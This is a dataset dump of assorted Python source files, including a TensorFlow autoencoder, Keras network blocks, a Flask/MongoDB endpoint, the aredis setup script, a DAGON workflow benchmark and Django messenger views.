s.append(emerge)\n self.To.commit_list_in_chunks(statements=s,\n verbose=verbose,\n chunk_length=chunk_length)\n\n def move_node_labels(self, match, node_key, chunk_length=2000, verbose=True):\n \"\"\"match = any match statement in which a node to move is specified with variable n.\n\n Look up labels for all nodes found by specified match in both From and To.\n For any case where a matched node (defined by node_key + shared labels) has labels in From but not To,\n move those labels.\"\"\"\n\n ret = \" return labels(n) as labs, n.%s\" % node_key\n From_results = self.From.commit_list([match + ret])\n To_results = self.To.commit_list([match + ret])\n\n def roll_label_lookup(results):\n dc = results_2_dict_list(results)\n out = {}\n for d in dc:\n out[d['n.%s' % node_key]] = set(d['labs'])\n return out\n\n From_label_lookup = roll_label_lookup(From_results)\n TO_label_lookup = roll_label_lookup(To_results)\n\n statements = set()\n\n for k, from_labels in From_label_lookup.items():\n if k in TO_label_lookup.keys():\n From_only = from_labels - TO_label_lookup[k] # find labels that are on this node in From, not to\n both = from_labels & TO_label_lookup[k] # Find labels that are on both nodes to use in Match\n if From_only:\n match_lab_string = ''\n from_only_lab_string = ':'+':'.join(From_only)\n if both:\n match_lab_string = ':'+':'.join(both)\n statements.add(\"MATCH (n%s) WHERE n.%s = '%s'\"\n \" SET n%s \" % (match_lab_string, node_key, k, from_only_lab_string))\n\n\n self.To.commit_list_in_chunks(statements=list(statements),\n verbose=verbose,\n chunk_length=chunk_length)\n\n\n \n \n \n \n \n\n \n \n \n\n\n \n \n \n \n \n \n","sub_path":"src/uk/ac/ebi/vfb/neo4j/neo4j_tools.py","file_name":"neo4j_tools.py","file_ext":"py","file_size_in_byte":14844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"640322857","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimage = np.load(\"test_GDSpgm.npy\")\nprint(\"Image Size:\",image.shape) # H=2000, W=5000\n\nplt.figure()\nplt.imshow(image, cmap='gray')\nplt.show()\n\ndef normailize_image(image):\n if np.max(image) == np.min(image):\n if np.max(image) > 0:\n return np.ones(image.shape)\n else:\n return np.zeros(image.shape)\n else:\n image = (image - np.min(image)) / (np.max(image) - np.min(image)) # normalize to [0,1]\n return image\n\nPIXEL_SIZE = 20 # nm\nCLIP_SIZE = 100 #pixel\n\nn_row = int(image.shape[0]/CLIP_SIZE)\nn_col = int(image.shape[1]/CLIP_SIZE)\n\nclip_lib = [] # clip holder\nfor i in range(n_row):\n for j in range(n_col):\n sub_clip = image[i*CLIP_SIZE : (i+1)*CLIP_SIZE, j*CLIP_SIZE : (j+1)*CLIP_SIZE]\n sub_clip_nor = normailize_image(sub_clip) # normalize to [0,1]\n clip_lib.append(sub_clip_nor)\n\nclip_lib = np.array(clip_lib)\nprint(clip_lib.shape)\n\nimport tensorflow as tf\n\ndef weight_variable(shape):\n '''Helper function to create a weight variable initialized with\n a normal distribution\n Parameters\n ----------\n shape : list\n Size of weight variable\n '''\n initial = tf.random_normal(shape, mean=0.0, stddev=0.01)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n '''Helper function to create a bias variable initialized with\n a constant value.\n Parameters\n ----------\n shape : list\n Size of weight variable\n '''\n initial = tf.random_normal(shape, mean=0.0, stddev=0.01)\n return tf.Variable(initial)\n \ndef conv2d_same(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 2, 2, 1], padding = 'SAME')\n\ndef deconv2d_same(x, W, output_shape):\n return tf.nn.conv2d_transpose(x, W, output_shape, strides = [1, 2, 2, 1], padding = 'SAME')\n \ndef conv2d_valid(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 2, 2, 1], padding = 'VALID')\n\ndef deconv2d_valid(x, W, output_shape):\n return tf.nn.conv2d_transpose(x, W, output_shape, strides = [1, 2, 2, 1], padding = 'VALID')\n\n\ndef autoencoder(x):\n # Num. 1 Convolutional Layer\n W_e_conv1 = weight_variable([5, 5, 1, 32])\n b_e_conv1 = bias_variable([32])\n h_e_conv1 = tf.nn.relu(tf.add(conv2d_same(x, W_e_conv1), b_e_conv1))\n # Num. 2 Convolutional Layer\n W_e_conv2 = weight_variable([5, 5, 32, 16])\n b_e_conv2 = bias_variable([16])\n h_e_conv2 = tf.nn.relu(tf.add(conv2d_same(h_e_conv1, W_e_conv2), b_e_conv2))\n # Num. 3 Convolutional Layer\n W_e_conv3 = weight_variable([5, 5, 16, 8])\n b_e_conv3 = bias_variable([8])\n h_e_conv3 = tf.nn.relu(tf.add(conv2d_valid(h_e_conv2, W_e_conv3), b_e_conv3))\n \n code_layer = h_e_conv3\n \n # Num. 1 Deconvolutional Layer\n W_d_conv1 = weight_variable([5, 5, 16, 8])\n output_shape_d_conv1 = tf.stack([tf.shape(x)[0], 25, 25, 16])\n h_d_conv1 = tf.nn.relu(deconv2d_valid(h_e_conv3, W_d_conv1, output_shape_d_conv1))\n # Num. 2 Deconvolutional Layer\n W_d_conv2 = weight_variable([5, 5, 32, 16])\n output_shape_d_conv2 = tf.stack([tf.shape(x)[0], 50, 50, 32])\n h_d_conv2 = tf.nn.relu(deconv2d_same(h_d_conv1, W_d_conv2, output_shape_d_conv2))\n # Num. 3 Deconvolutional Layer\n W_d_conv3 = weight_variable([5, 5, 1, 32])\n output_shape_d_conv3 = tf.stack([tf.shape(x)[0], 100, 100, 1])\n h_d_conv3 = tf.nn.relu(deconv2d_same(h_d_conv2, W_d_conv3, output_shape_d_conv3))\n \n x_reconstruct = h_d_conv3\n \n cost = tf.reduce_mean(tf.pow(x_reconstruct - x, 2))\n \n return cost, x_reconstruct, code_layer\n\n \n#def main():\nnum_sample = clip_lib.shape[0]\nBATCH_SIZE = 50\n# placeholders for the images\ntf.reset_default_graph()\nx = tf.placeholder(tf.float32, shape=[None, 100, 100, 1])\n\n# build the model\nloss, output, latent = autoencoder(x)\n\n# and we use the Adam Optimizer for training\ntrain_step = tf.train.AdamOptimizer(1e-4).minimize(loss)\n\n\n\nsess = tf.InteractiveSession()\ninit_op = tf.global_variables_initializer()\nsess.run(init_op)\n\nfor i in range(1001):\n batch = clip_lib[np.random.choice(np.arange(num_sample), size=BATCH_SIZE, replace=False)]\n batch = batch.reshape(-1, 100, 100, 1)\n feed = {x : batch}\n if i % 20 == 0:\n train_loss = sess.run(loss, feed_dict=feed)\n print(\"step %d, training loss: %g\" % (i, train_loss))\n\n train_step.run(feed_dict={x: batch})\nprint(\"final loss %g\" % loss.eval(feed_dict={x: clip_lib.reshape(-1, 100, 100, 1)}))\n\n\n\ndef plot_n_reconstruct(origin_img, reconstruct_img, n = 10):\n plt.figure(figsize=(2 * 10, 4))\n for i in range(n):\n # display original\n ax = plt.subplot(2, n, i + 1)\n plt.imshow(origin_img[i])\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n # display reconstruction\n ax = plt.subplot(2, n, i + 1 + n)\n plt.imshow(reconstruct_img[i])\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n plt.show()\n\ntest_size = 10\ntest_origin_img = clip_lib[np.random.choice(np.arange(num_sample), size=test_size, replace=False)]\ntest_reconstruct_img = output.eval(feed_dict = {x: test_origin_img.reshape(-1, 100, 100, 1)})\ntest_reconstruct_img = test_reconstruct_img.reshape(-1, 100, 100)\nplot_n_reconstruct(test_origin_img, test_reconstruct_img)\n\n\ndef plot_conv_layer(layer, image, num_filters):\n output = sess.run(layer, feed_dict = {x: image.reshape(-1, 100, 100, 1)}) \n fig, axes = plt.subplots(3, 3) \n for i, ax in enumerate(axes.flat):\n if i < num_filters:\n img = output[0, :, :, i]\n ax.imshow(img, interpolation='nearest', cmap='gray')\n else:\n ax.imshow(image, interpolation='nearest', cmap='gray')\n ax.set_xticks([])\n ax.set_yticks([]) \n plt.show()\n\nimage1 = clip_lib[20]\nplot_conv_layer(latent, image1, 8)\n\n\n\n\n\n","sub_path":"autoencoder_FeatureExtraction_V2.py","file_name":"autoencoder_FeatureExtraction_V2.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"151424175","text":"\"\"\"Network utility functions.\"\"\"\n\nfrom typing import Tuple\n\nimport tensorflow as tf\n\n# Default options used in all non-logit convolutional layers.\nOPTIONS_CONV = {\"kernel_size\": 3, \"padding\": \"same\", \"kernel_initializer\": \"he_normal\"}\n\n\ndef inception_naive_block(\n inputs: tf.keras.layers.Layer, filters: int\n) -> tf.keras.layers.Layer:\n \"\"\"Inception naive block.\n\n [Conv2d(1,1), Conv2D(3,3), Conv2D(5,5), MaxPooling2D(3,3)] -> output\n\n Args:\n inputs: Input layer.\n filters: Number of convolutional filters applied.\n \"\"\"\n # 1x1 conv\n conv1 = tf.keras.layers.Conv2D(\n filters,\n (1, 1),\n activation=\"relu\",\n padding=\"same\",\n kernel_initializer=\"he_normal\",\n )(inputs)\n # 3x3 conv\n conv3 = tf.keras.layers.Conv2D(\n filters * 2,\n (3, 3),\n activation=\"relu\",\n padding=\"same\",\n kernel_initializer=\"he_normal\",\n )(inputs)\n # 5x5 conv\n conv5 = tf.keras.layers.Conv2D(\n filters * 4,\n (5, 5),\n activation=\"relu\",\n padding=\"same\",\n kernel_initializer=\"he_normal\",\n )(inputs)\n # 3x3 max pooling\n pool = tf.keras.layers.MaxPooling2D((3, 3), strides=(1, 1), padding=\"same\")(inputs)\n\n # concatenate filters, assumes filters/channels last\n layer_out = tf.keras.layers.concatenate([conv1, conv3, conv5, pool], axis=-1)\n return layer_out\n\n\ndef conv_block(\n inputs: tf.keras.layers.Layer, filters: int, n_convs: int = 2, dropout: float = 0\n) -> tf.keras.layers.Layer:\n \"\"\"Convolutional block with optional dropout layer.\n\n n_convs * (Conv2D -> ReLU -> Optional Dropout).\n\n Args:\n inputs: Input layer.\n filters: Number of convolutional filters applied.\n n_convs: Number of convolution+relu blocks.\n dropout: If > 0, a dropout layer will be added.\n \"\"\"\n x = inputs\n for _ in range(n_convs):\n x = tf.keras.layers.Conv2D(filters, **OPTIONS_CONV)(x)\n x = tf.keras.layers.Activation(\"relu\")(x)\n x = tf.keras.layers.Dropout(dropout)(x)\n return x\n\n\ndef convpool_block(\n inputs: tf.keras.layers.Layer, filters: int, n_convs: int = 2\n) -> tf.keras.layers.Layer:\n \"\"\"Conv_block with added 2D MaxPooling.\"\"\"\n x = conv_block(inputs=inputs, filters=filters, n_convs=n_convs)\n x = tf.keras.layers.MaxPooling2D()(x)\n\n return x\n\n\ndef convpool_skip_block(\n inputs: tf.keras.layers.Layer, filters: int, n_convs: int = 2\n) -> Tuple[tf.keras.layers.Layer, tf.keras.layers.Layer]:\n \"\"\"Conv_block with skip connection.\n\n Returns:\n skip: Layer to be used as skip connection. Output from conv_block.\n x: Layer to be used in next process. Output from 2D MaxPooling.\n \"\"\"\n skip = conv_block(inputs=inputs, filters=filters, n_convs=n_convs)\n x = tf.keras.layers.MaxPooling2D()(skip)\n\n return skip, x\n\n\ndef upconv_block(\n inputs: tf.keras.layers.Layer,\n skip: tf.keras.layers.Layer,\n filters: int,\n n_convs: int = 2,\n dropout: float = 0,\n) -> tf.keras.layers.Layer:\n \"\"\"Upconvolutional block with skip connection concatenation.\n\n Upsampling -> Conv2D -> ReLU -> Concatenation with skip -> Conv_block.\n\n Args:\n inputs: Input layer.\n skip: Skip connection input layer.\n filters: Number of convolutional filters applied.\n n_convs: Number of convolution+relu blocks after concatenation.\n dropout: If > 0, a dropout layer will be added.\n \"\"\"\n x = inputs\n x = tf.keras.layers.UpSampling2D()(x)\n x = tf.keras.layers.Conv2D(filters=filters, **OPTIONS_CONV)(x)\n x = tf.keras.layers.Activation(\"relu\")(x)\n x = tf.keras.layers.Dropout(dropout)(x)\n x = tf.keras.layers.Concatenate()([skip, x])\n x = conv_block(inputs=x, filters=filters, n_convs=n_convs, dropout=dropout)\n\n return x\n\n\ndef residual_block(\n inputs: tf.keras.layers.Layer, filters: int\n) -> tf.keras.layers.Layer:\n \"\"\"Simple residual block with skip connection addition.\n\n Conv2D -> ReLU (skip) -> Conv2D -> ReLU -> Conv2D -> Addition with skip -> ReLU.\n \"\"\"\n x = tf.keras.layers.Conv2D(filters=filters, **OPTIONS_CONV)(inputs)\n x = tf.keras.layers.Activation(\"relu\")(x)\n skip = x\n\n x = tf.keras.layers.Conv2D(filters=filters, **OPTIONS_CONV)(x)\n x = tf.keras.layers.Activation(\"relu\")(x)\n x = tf.keras.layers.Conv2D(filters=filters, **OPTIONS_CONV)(x)\n\n x = tf.keras.layers.Add()([x, skip])\n x = tf.keras.layers.Activation(\"relu\")(x)\n\n return x\n\n\ndef logit_block(\n inputs: tf.keras.layers.Layer, n_channels: int\n) -> tf.keras.layers.Layer:\n \"\"\"Final decision output with sigmoid/softmax activation depending on n_channels.\"\"\"\n x = tf.keras.layers.Conv2D(filters=n_channels, kernel_size=1)(inputs)\n if n_channels == 1:\n x = tf.keras.layers.Activation(\"sigmoid\")(x)\n else:\n x = tf.keras.layers.Activation(\"softmax\")(x)\n\n return x\n","sub_path":"deepblink/networks/_networks.py","file_name":"_networks.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"562585635","text":"# vim: ts=2:sw=2:tw=80:nowrap\n\ndef recursive_update(D, new):\n \"\"\"\n Recursively update the config template hierarchy. The intent of this function\n is to allow configuration items to be added to a device config without\n requiring an file-version upgrade. This is only possible, if the new items\n come with reasonable defaults.\n if\n - a configuration item must be changed\n - a configuration item must be removed\n - a new configuration item does not come with reasonable defaults\n then a new file-version upgrade _must_ be implemented.\n \"\"\"\n for k, dsub in new.items():\n if 'value' in dsub:\n D[k] = dsub.copy()\n else:\n recursive_update(D.setdefault(k, dict()), dsub)\n\n\n","sub_path":"python/arbwave/tools/config_template_update.py","file_name":"config_template_update.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"504732570","text":"import os\r\nimport logging\r\nfrom pymongo import MongoClient\r\nfrom flask import Flask, request\r\nfrom jsonschema import validate, ValidationError\r\nfrom dotenv import load_dotenv\r\nimport validation_schemas\r\n\r\nload_dotenv()\r\n\r\napp = Flask(__name__)\r\napp.logger.setLevel(\"INFO\")\r\napp.logger.info(\"Hello!\")\r\n\r\nif not os.getenv(\"DATABASE_URL\"):\r\n raise RuntimeError(\"DATABASE_URL is not set\")\r\nclient = MongoClient(os.getenv(\"DATABASE_URL\"))\r\ndb = client.starbase0\r\n\r\n@app.route(\"/\", methods = [\"POST\"])\r\ndef hello():\r\n try:\r\n app.logger.info(\"hello was called\")\r\n\r\n data = request.json\r\n app.logger.info(\"request: %s\", data)\r\n validate(data, validation_schemas.request)\r\n\r\n name = data[\"name\"]\r\n\r\n person = db.people.find_one({\"name\": name})\r\n app.logger.info(\"database item found: %s\", person)\r\n\r\n response = {\"message\": \"Hello \" + person[\"name\"] + \"!\"}\r\n validate(response, validation_schemas.response)\r\n\r\n return response\r\n\r\n except Exception as inst:\r\n app.logger.error(inst)\r\n \r\n return {\"message\": \"Did not find person.\"}","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"536761857","text":"import calendar\nfrom datetime import date\n\n#===============================================================================\n# Return a passed number with th/st/nd added\n#===============================================================================\ndef num_format(n):\n return str(n)+(\"th\" if 4<=n%100<=20 else {1:\"st\",2:\"nd\",3:\"rd\"}.get(n%10, \"th\"))\n\n#===============================================================================\n# Needed this function to get dates for future events\n#===============================================================================\ndef dow_date_finder(N_STR='First',WEEKDAY_STR='Monday',MONTH_STR='January',year=date.today().year):\n day=['Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Sunday'].index(WEEKDAY_STR)\n month=['January','February','March','April','May','June','July','August','September','October','November','December'].index(MONTH_STR)+1\n \n if N_STR in ['First','Second','Third','Fourth']:\n which_weekday_in_month=['First','Second','Third','Fourth'].index(N_STR)\n elif N_STR in ['Last','Second to Last','Third to Last']:\n which_weekday_in_month=-(1+['Last','Second to Last','Third to Last'].index(N_STR))\n \n bom, days = calendar.monthrange(year, month)\n firstmatch = (day - bom) % 7 + 1\n day = range(firstmatch, days+1, 7)[which_weekday_in_month]\n return date(year, month, day)\n\n\ndef postmark_email(subject, to_address, body, tag):\n import os\n from postmark import PMMail\n message = PMMail(\n api_key = os.environ.get('POSTMARK_API_KEY'),\n subject = subject,\n sender = \"shorewoodmensclub@googlegroups.com\",\n to = to_address,\n text_body = body,\n tag = tag\n )\n message.send()","sub_path":"smc/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"22735738","text":"\ndef countWord(fname,word):\n k = 0\n with open(fname, 'r') as f:\n for line in f:\n # print(line)\n words = line.split()\n for i in words:\n if(i==word):\n k=k+1\n return k\n\nprint(countWord('./files/testfile.txt', 'dummy'))\n","sub_path":"count_word.py","file_name":"count_word.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"396467211","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport warnings\n\nfrom aredis import __version__\n\ntry:\n from setuptools import setup\n from setuptools.command.test import test as TestCommand\n from setuptools.command.build_ext import build_ext\n from setuptools.extension import Extension\n\n\n class PyTest(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n\n def run_tests(self):\n # import here, because outside the eggs aren't loaded\n import pytest\n errno = pytest.main(self.test_args)\n sys.exit(errno)\n\nexcept ImportError:\n\n from distutils.core import setup, Extension\n from distutils.command.build_ext import build_ext\n\n\n def PyTest(x):\n x\n\n\nclass custom_build_ext(build_ext):\n \"\"\"\n These code comes from tornado.\n Allow C extension building to fail.\n\n The C extension speeds up crc16, but is not essential.\n \"\"\"\n\n warning_message = \"\"\"\n********************************************************************\nWARNING: %s could not\nbe compiled. No C extensions are essential for aredis to run,\nalthough they do result in significant speed improvements for\nwebsockets.\n%s\n\nHere are some hints for popular operating systems:\n\nIf you are seeing this message on Linux you probably need to\ninstall GCC and/or the Python development package for your\nversion of Python.\n\nDebian and Ubuntu users should issue the following command:\n\n $ sudo apt-get install build-essential python-dev\n\nRedHat and CentOS users should issue the following command:\n\n $ sudo yum install gcc python-devel\n\nFedora users should issue the following command:\n\n $ sudo dnf install gcc python-devel\n\nIf you are seeing this message on OSX please read the documentation\nhere:\n\nhttp://api.mongodb.org/python/current/installation.html#osx\n********************************************************************\n\"\"\"\n\n def run(self):\n try:\n build_ext.run(self)\n except Exception:\n e = sys.exc_info()[1]\n sys.stdout.write('%s\\n' % str(e))\n warnings.warn(self.warning_message % (\"Extension modules\",\n \"There was an issue with \"\n \"your platform configuration\"\n \" - see above.\"))\n\n def build_extension(self, ext):\n name = ext.name\n try:\n build_ext.build_extension(self, ext)\n except Exception:\n e = sys.exc_info()[1]\n sys.stdout.write('%s\\n' % str(e))\n warnings.warn(self.warning_message % (\"The %s extension \"\n \"module\" % (name,),\n \"The output above \"\n \"this warning shows how \"\n \"the compilation \"\n \"failed.\"))\n\n\nf = open(os.path.join(os.path.dirname(__file__), 'README.rst'))\nlong_description = f.read()\nf.close()\n\nsetup(\n name='aredis',\n version=__version__,\n description='Python async client for Redis key-value store',\n long_description=long_description,\n url='https://github.com/NoneGG/aredis',\n author='Jason Chen',\n author_email='847671011@qq.com',\n maintainer='Jason Chen',\n maintainer_email='847671011@qq.com',\n keywords=['Redis', 'key-value store', 'asyncio'],\n license='MIT',\n packages=['aredis', 'aredis.commands'],\n tests_require=['pytest',\n 'pytest_asyncio>=0.5.0'],\n cmdclass={\n 'test': PyTest,\n 'build_ext': custom_build_ext\n },\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6'\n ],\n ext_modules=[\n Extension(name='aredis.speedups',\n sources=['aredis/speedups.c']),\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"404415038","text":"import json\nimport os.path\nimport time\nfrom dagon import Workflow\nfrom dagon.task import DagonTask, TaskType\nfrom dagon.docker_task import DockerTask\nfrom dagon import Status\nfrom dagon.dag_tps import DAG_TPS\nimport sys\nimport logging\nimport time\n\ndef cleanContainers():\n os.system('docker rm -f $(docker ps -aq --filter ancestor=module_todb:v1)')\n os.system('docker rm -f $(docker ps -aq --filter ancestor=module_interpolation:v1)')\n\n\n# 2 workflows in a DAGTP adding TPS\nif __name__ == '__main__':\n\n command_dir = sys.argv[1]\n no_TPS = int(sys.argv[2]) \n iterations = 31\n\n logfile= open(\"../logs/\"+str(no_TPS)+\"_TPS_test.txt\", \"a+\")\n logfile.write(\"building,validation,runtime,extraction,processing,\\n\")\n\n # Create the orchestration workflow\n for i in range(0,iterations):\n\n meta_workflow = DAG_TPS(\"DAGtp_2WF_\"+str(no_TPS)+\"TPS\")\n start_building = time.time()\n\n wf_a = Workflow(\"TestTPS_WFa\")\n taskA = DagonTask(TaskType.BATCH, \"AdquisitionA\", \"cp -r \"+command_dir+\"/launcher/lib $PWD;java -jar \"+command_dir+\"launcher/launcher.jar 1 1 01-01-2019 31-01-2019 $PWD/ adq_tps_a\")\n taskB = DockerTask(\"InterpolationA\", \"python /home/Interpolacion.py -i workflow:///AdquisitionA/metadata/FilesNc -w 1 \", image=\"module_interpolation:v1\")\n taskC = DockerTask(\"UploaderA\", \"python /home/upload.py -i workflow:///InterpolationA/output -w 1 \", image=\"module_todb:v1\")\n \n wf_b = Workflow(\"TestTPS_WFb\")\n taskD = DagonTask(TaskType.BATCH, \"AdquisitionB\", \"cp -r \"+command_dir+\"/launcher/lib $PWD;java -jar \"+command_dir+\"launcher/launcher.jar 1 1 01-03-2019 31-03-2019 $PWD/ adq_tps_b\")\n taskE = DockerTask(\"InterpolationB\", \"python /home/Interpolacion.py -i workflow:///AdquisitionB/metadata/FilesNc -w 1 \", image=\"module_interpolation:v1\")\n taskF = DockerTask(\"UploaderB\", \"python /home/upload.py -i workflow:///InterpolationB/output -w 1 \", image=\"module_todb:v1\")\n\n wf_a.add_task(taskA)\n wf_a.add_task(taskB)\n wf_a.add_task(taskC)\n\n wf_b.add_task(taskD)\n wf_b.add_task(taskE)\n wf_b.add_task(taskF)\n\n meta_workflow.add_workflow(wf_a)\n meta_workflow.add_workflow(wf_b)\n\n meta_workflow.make_dependencies()\n\n end_building = time.time() #end building\n start_validation = time.time() #start validate\n meta_workflow.Validate_WF()\n end_validation = time.time() #end validation\n\n\n # run the workflow\n start_exe = time.time() #start execution\n meta_workflow.run()\n end_exe = time.time() #end execution\n\n start_extraction = time.time() #start data extraction \n\n TPS = dict()\n for TPP in range(1,no_TPS+1):\n TPS[str(TPP)] = meta_workflow.Create_TPP_Double(\"InterpolationA\", \"InterpolationB\" , \"Station_code-Station_code\", Bpath=\"output/\", Apath=\"output/\")\n meta_workflow.prepare_tps() #extract data\n end_extraction = time.time() #end data extraction \n\n start_proc= time.time() #start TPS \n\n for TPP in range(1,no_TPS+1):\n a = meta_workflow.TPSapi.Describe(TPS[str(TPP)])\n end_proc= time.time() #end TPS \n \n logfile.write(\"%s,%s,%s,%s,%s\\n\" %(end_building-start_building, end_validation-start_validation, end_exe-start_exe,end_extraction-start_extraction,end_proc-start_proc))\n\n cleanContainers()\n\n logfile.close()","sub_path":"examples/Transversal_test_scripts/TPS/test_TPS_nointerference.py","file_name":"test_TPS_nointerference.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"222193224","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv(\"debug.csv\", sep=\",\")\n#dataframe = pd.DataFrame({'Col': np.random.uniform(size=1000)})\n\ny=data.values[1:,10]\nx=data.values[1:,0]\ncolor = np.where( data.values[1:,6]=='f','r', 'b')\nplt.figure()\nplt.scatter(x,y,c=color)\nplt.ylabel(\"Stress\")\nplt.title(\"Genderwise Stress distribution\")\n#plt.xlabel(\"Possibilities\")\nplt.legend('m','f')","sub_path":"Assignment-1/1A/scatterplot.py","file_name":"scatterplot.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"530400732","text":"from Class_OOP import Student\r\n\r\n\r\nclass Triangle:\r\n base = ''\r\n height = ''\r\n\r\n def __init__(self, base, height):\r\n self.base = base\r\n self.height = height\r\n\r\n def calculate_area(self):\r\n area = 0.5 * self.base * self.height\r\n print('Area=', area)\r\n\r\n\r\nclass nothing (Student):\r\n print('Nothing Class')\r\n\r\n\r\nt1 = Triangle(10, 20)\r\nt1.calculate_area()\r\n\r\n\r\nt2 = Triangle(20, 30)\r\nt2.calculate_area()\r\n\r\ntt1 = nothing(1009,'Shakib Sha', 3.99)\r\n\r\nx = 1 + 2 * 3 - 8 / 4\r\nprint(x)","sub_path":"pythonProject1/Exercise.py","file_name":"Exercise.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"19671629","text":"from django.db import models\nfrom atracoes.models import Atracao\nfrom comentarios.models import Comentario\n#from comentarios.models import Avaliacao\nfrom enderecos.models import Endereco\n\n\nclass pontoTuristico(models.Model):\n nome = models.CharField('nome', max_length=130)\n descricao= models.TextField(name='descricao')\n status= models.BooleanField(name='status',default=False)\n atracoes = models.ManyToManyField(Atracao)\n comentarios = models.ManyToManyField(Comentario)\n #avaliacao = models.ManyToManyField(Avaliacao)\n endereco = models.ForeignKey(Endereco, on_delete=models.CASCADE,null=True,blank=True)\n foto = models.ImageField(upload_to= 'pontos_turisticos',null=True,blank=True)\n\n def __str__(self):\n return self.nome\n \n\n class Meta:\n db_table= 'ponto turistico'\n verbose_name= \"Ponto turistico\"\n verbose_name_plural= \"Pontos turisticos\"\n\n\n","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"355043417","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.views.decorators.cache import cache_page\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.apps import apps\n\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom users.serializers import UserSerializer\nfrom rest_framework.decorators import action\n\nfrom users.documents import UserDocument\n# Create your views here.\n\n\n'''@csrf_exempt\n@require_GET\n@login_required\ndef index(request):\n return render(request, 'users_index.html')'''\n\n\n@csrf_exempt\n@require_GET\n@login_required\ndef profile_details(request):\n User = apps.get_model('users', 'User')\n #user = User.objects.filter(id=request.GET['user_id']).values('id', 'username', 'first_name', 'avatar').first()\n user = User.objects.filter(id=request.user.id).values('id', 'username', 'first_name', 'avatar').first()\n return JsonResponse({'profile': user})\n\n@cache_page(60*15)\n@csrf_exempt\n@require_GET\n@login_required\ndef contacts_list(request):\n User = apps.get_model('users', 'User')\n \n users = User.objects.all().values('id', 'username', 'first_name', 'avatar')\n return JsonResponse({'contacts': list(users)})\n \n \n@csrf_exempt\n@require_GET\n@login_required\ndef search_users(request):\n User = apps.get_model('users', 'User')\n \n users = User.objects.filter(username__contains=request.GET['name']).values('id', 'username', 'first_name', 'avatar')[:int(request.GET['limit'])]\n return JsonResponse({'users': list(users)})\n\n@csrf_exempt\n@require_GET\n#@login_required\ndef search(request):\n users = UserDocument.search().query('wildcard', username='*' + str(request.GET['name']) + '*')[:10]\n users = users.to_queryset().values('username', 'first_name', 'avatar')\n \n return JsonResponse({'users': list(users)})\n\n\nclass UsersViewSet(viewsets.ModelViewSet):\n \n User = apps.get_model('users', 'User')\n \n serializer_class = UserSerializer\n queryset = User.objects.all()\n \n @action(methods=['get'], detail=False)\n def search_users(self, request):\n users = self.get_queryset()\n users = users.filter(username__contains=request.GET['name'])[:int(request.GET['limit'])]\n serializer = self.get_serializer(users, many=True)\n return Response({'users': serializer.data})\n \n @method_decorator(cache_page(60*15))\n @action(methods=['get'], detail=False)\n def contacts(self, request):\n users = self.get_queryset()\n serializer = self.get_serializer(users, many=True)\n return Response({'contacts': serializer.data})\n\n @action(methods=['get'], detail=False)\n def profile_details(self, request):\n user = self.get_queryset()\n user = user.filter(id=request.user.id).first()\n serializer = self.get_serializer(user, many=False)\n return Response({'profile': serializer.data})\n","sub_path":"messenger/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"229934822","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Sequential\n\nimport matplotlib.pyplot as plt \nimport tempfile\n\nATTR_KEY = \"attributes\"\nIMAGE_KEY = \"image\"\nLABEL_KEY 